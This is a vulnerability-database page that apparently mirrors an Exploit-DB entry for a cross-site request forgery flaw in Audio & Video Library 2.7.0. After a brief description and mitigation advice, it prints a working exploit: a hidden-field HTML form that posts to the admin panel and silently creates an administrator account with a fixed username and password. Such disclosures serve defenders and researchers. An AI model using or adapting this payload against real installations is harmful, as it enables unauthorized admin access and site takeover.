header-logo
Suggest Exploit
vendor:
Audio & Video Library
by:
AtT4CKxT3rR0r1ST
7.5
CVSS
HIGH
XSRF
352
CWE
Product Name: Audio & Video Library
Affected Version From: 2.7.2000
Affected Version To: 2.7.2000
Patch Exists: NO
Related CWE: Unknown
CPE: a:audio_and_video_library:audio_and_video_library:2.7.0
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Audio & Video Library 2.7.0 XSRF Vulnerability (Add Admin)

This vulnerability allows an attacker to perform Cross-Site Request Forgery (XSRF) attack by adding an admin user to the Audio & Video Library application. The attacker can send a crafted request to the target application, which will add an admin user without authentication or authorization.

Mitigation:

To mitigate this vulnerability, developers should implement proper CSRF protection measures such as using CSRF tokens, checking referrer headers, and implementing strict validation checks for sensitive actions.
Source

Exploit-DB raw data:

Audio & Video Library 2.7.0 XSRF Vulnerability (Add Admin)
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://allomani.com/en/audio_and_video_script.html
####################################################################

===[ Exploit ]===

<form method="POST" name="form0" action="http://localhost/Audio&VideoLibrary/admin/index.php">
<input type="hidden" name="action" value="adduserok"/>
<input type="hidden" name="hash" value="e10adc3949ba59abbe56e057f20f883e"/>
<input type="hidden" name="username" value="webadmin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="email" value="Example@hotmail.com"/>
<input type="hidden" name="group_id" value="1"/>
<input type="hidden" name="useraddbutton" value="Add"/>
</form>

</body>
</html>
####################################################################